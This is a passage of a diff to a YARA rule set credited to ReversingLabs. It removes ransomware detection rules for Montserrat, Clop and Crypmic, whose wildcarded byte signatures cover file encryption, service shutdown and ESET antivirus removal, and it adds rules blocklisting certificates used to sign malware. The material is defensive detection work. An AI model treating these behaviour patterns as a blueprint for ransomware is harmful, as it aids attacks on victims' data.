-		$encrypt_files_p3 = {
-            6A ?? 6A ?? 66 0F 13 44 24 ?? FF 74 24 ?? FF 74 24 ?? FF 36 FF 15 ?? ?? ?? ?? 6A ??
-            8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ?? C6 44
-            24 ?? ?? FF 36 FF 15 ?? ?? ?? ?? 80 7C 24 ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 83 C6 ??
-            56 FF 15 ?? ?? ?? ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
-            8B 75 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $enum_shares_p* ) ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "D and D Internet Services" and pe.signatures [ i ] . serial == "1c:b6:51:9b:25:28:d0:06:d1:da:98:71:53:da:d2:b3" and 1012780800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Montserrat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_621E696C3A6371E77A678Cbf0Ee34Ab2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Montserrat ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "deeb5f1a-1329-5964-93e1-8ca6a20fcd89"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "606749dc-f4ef-526a-8583-486401866759"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Montserrat.yara#L1-L118"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c8782a8cb2b87e76ff1f804ee8affd01405827d0914ea725bb0e9ddace7dde10"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15224-L15240"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "67c9fd92681d6dd1172509113e167e74e07f1f86fd62456758b3e3930180b528"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Montserrat"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
-            7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ??
-            03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F
-            5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ??
-            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ??
-            89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ??
-            ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ??
-            8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ??
-            8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7
-        }
-		$find_files_p2 = {
-            EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50
-            57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD
-            5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85
-            ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ??
-            ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D
-            ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8
-            ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
-            83 C4 ?? E9
-        }
-		$encrypt_files_p1 = {
-            8B FF 55 8B EC 83 EC ?? 53 56 57 FF 75 ?? 8D 45 ?? FF 75 ?? FF 75 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 7D ?? 8B F0 6A ?? 59 F3 A5 83 CE ?? 39 75 ?? 75 ?? E8 ?? ?? ?? ?? 83
-            20 ?? 8B 45 ?? 89 30 E8 ?? ?? ?? ?? 8B 00 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 89
-            03 3B C6 75 ?? E8 ?? ?? ?? ?? 83 20 ?? 89 33 E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ??
-            8B 45 ?? 8D 75 ?? 83 65 ?? ?? 33 C9 41 C7 45 ?? ?? ?? ?? ?? 83 EC ?? 89 08 8B 45 ??
-            C1 E8 ?? F7 D0 23 C1 6A ?? 59 89 45 ?? 8B FC 8D 45 ?? 50 FF 75 ?? F3 A5 E8 ?? ?? ??
-            ?? 8B F8 83 C4 ?? 89 7D ?? BA ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 4D ?? 8B C1 23 C2 3B C2
-            75 ?? F6 45 ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 81 E1 ?? ?? ?? ?? 8D 75 ?? 89 4D ?? 6A ??
-            59 8B FC 50 FF 75 ?? F3 A5 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 89 7D ?? 83 FF ?? 75 ?? 8B
-            0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 80 64 08 ?? ?? FF 15 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
-            ?? ?? ?? 8B F0 56 E8 ?? ?? ?? ?? 59 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 57 8B 04
-            85 ?? ?? ?? ?? 80 64 08 ?? ?? FF 15 ?? ?? ?? ?? 85 F6 0F 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? C7 00 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8A 45 ?? 0C ?? EB ?? 83 F8 ?? 8A
-        }
-		$encrypt_files_p2 = {
-            45 ?? 75 ?? 0C ?? 57 FF 33 88 45 ?? E8 ?? ?? ?? ?? 8A 55 ?? 59 59 8B 0B 80 CA ?? 8B
-            C1 88 55 ?? 83 E1 ?? C1 F8 ?? 6B C9 ?? 88 55 ?? 8B 04 85 ?? ?? ?? ?? 88 54 08 ?? 8B
-            0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? F6 45 ?? ?? 8B 04 85 ?? ?? ?? ?? C6 44 08 ?? ??
-            74 ?? FF 33 E8 ?? ?? ?? ?? 8B F0 59 85 F6 75 ?? 8D 45 ?? C6 45 ?? ?? 50 FF 75 ?? 8D
-            75 ?? 83 EC ?? 6A ?? 59 8B FC FF 33 F3 A5 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B F0
-            FF 33 E8 ?? ?? ?? ?? 59 8B C6 E9 ?? ?? ?? ?? 8B 03 8B C8 83 E0 ?? C1 F9 ?? 6B D0 ??
-            8A 45 ?? 8B 0C 8D ?? ?? ?? ?? 88 44 11 ?? 8B 0B 8B C1 C1 F8 ?? 83 E1 ?? 6B D1 ?? 8B
-            0C 85 ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 32 44 11 ?? 24 ?? 30 44 11 ?? F6 45 ?? ?? 75 ??
-            F6 45 ?? ?? 74 ?? 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 80 4C
-            08 ?? ?? 8B 75 ?? B9 ?? ?? ?? ?? 8B C6 23 C1 3B C1 0F 85 ?? ?? ?? ?? F6 45 ?? ?? 74
-            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 81 E6 ?? ?? ?? ?? 89 75 ?? 8D 75 ??
-            6A ?? 59 8B FC 50 FF 75 ?? F3 A5 E8 ?? ?? ?? ?? 8B D0 83 C4 ?? 83 FA ?? 75 ?? FF 15
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ??
-            ?? ?? 80 64 08 ?? ?? FF 33 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8B 0B 8B C1 C1 F8 ?? 83
-            E1 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 89 54 08 ?? 33 C0 5F 5E 5B 8B E5 5D C3
-        }
-		$shutdown_services_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B F9 8B 75 ?? 8B 1D
-            ?? ?? ?? ?? FF D3 83 7E ?? ?? 89 45 ?? 72 ?? 8B 36 6A ?? 56 FF 37 FF 15 ?? ?? ?? ??
-            8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? 56 FF 15
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? 8B
-            4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ??
-            ?? 83 F8 ?? 75 ?? 66 90 FF 77 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A
-            ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF D3 2B 45 ?? 3B
-            47 ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B CF E8
-            ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84
-        }
-		$shutdown_services_p2 = {
-            FF 77 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF D3 2B 45 ?? 3B 47 ?? 0F 87
-            ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8
-            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $shutdown_services_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "62:1e:69:6c:3a:63:71:e7:7a:67:8c:bf:0e:e3:4a:b2" and 1467072000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Clop : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_21B991 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Clop ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0ea63119-3773-5404-b332-8e3966fd35df"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "333a0901-21e7-5b4a-8daa-6a04fc2c4e86"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Clop.yara#L1-L109"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0b63db16a4b1cae27a97d0ff9df692a63f1a11120ffac69c05a5c71fbd224007"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15242-L15258"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "54ca9b19adfc9357a3fb74f0670ad929319c4d06a7de7ae400f8285a31052276"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Clop"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 6A ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ??
-            83 C4 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 BD ??
-            ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 68 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ??
-            ?? 51 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ??
-            ?? 8B 88 ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 8B 82 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 8B
-            91 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8
-            ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ??
-            ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ??
-            68 ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74
-            ?? 68 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
-            74 ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
-            ?? ?? 52 FF 15
-        }
-		$encrypt_files_p2 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 50 8D
-            4D ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 FF
-            15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8D 95 ??
-            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 8D 85
-            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 6A ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 6A ??
-            68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 6A ?? 8B
-            8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 85 D2 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D
-            ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 6A ?? 6A ?? E8 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 6A ?? 6A ?? E8 ?? ??
-            ?? ?? 50 8B 15 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
-            E5 5D C2
-        }
-		$encrypt_files_p3 = {
-            55 8B EC 83 EC ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B
-            4D ?? 51 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? FF 15 ?? ?? ?? ?? 33 C0 EB ?? 8B 4D ?? 51 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8D 4D ??
-            51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
-            ?? ?? ?? 33 C0 EB ?? 8B 4D ?? 8B 55 ?? 89 11 33 C0 8B E5 5D C3
-        }
-		$find_files = {
-            8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52
-            8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ??
-            8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD
-            ?? ?? ?? ?? ?? 75 ?? EB ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85
-            C0 76 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ?? 68
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
-            51 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ??
-            ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 E8
-        }
-		$uninstall_eset_av = {
-            8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 86 ?? ?? ?? ?? 8D 4D ?? 51 68 ?? ?? ?? ?? 8D
-            95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ??
-            ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 8D ??
-            ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ??
-            ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $uninstall_eset_av )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Web Nexus d.o.o." and pe.signatures [ i ] . serial == "21:b9:91" and 1125477041 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Crypmic : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1Cc37De5Dbed097F98F56Dbc : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Crypmic ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0d5c2141-c0ca-53c8-91fd-ec2d5f163df2"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "8c362133-a30f-599d-88e0-a1448433178a"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Crypmic.yara#L1-L56"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ee97c4d35cee68e080a4e9e0a21ecd3698da638463881a58f5daaf906ef86f75"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15260-L15276"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a2d04275b9fe37308c8f1dca75f4cc3c4a8985930f901e1f46e3ddc2977eea32"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Crypmic"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_and_encrypt_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 B8 ?? ?? ?? ?? 57 8B F9 89 7D ?? C7 45 ?? ?? ?? ??
-            ?? 89 45 ?? 8D 50 ?? 68 ?? ?? ?? ?? 6A ?? FF 77 ?? 66 89 85 ?? ?? ?? ?? 8B 47 ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D0 66 8B 95 ?? ?? ?? ?? 33 F6 33
-            C9 89 45 ?? 66 3B F2 74 ?? 0F B7 D2 41 66 89 14 06 8D 34 09 33 DB 0F B7 94 35 ?? ??
-            ?? ?? 66 3B DA 75 ?? BA ?? ?? ?? ?? 66 89 14 48 8D 1C 48 8D 8D ?? ?? ?? ?? 51 C7 43
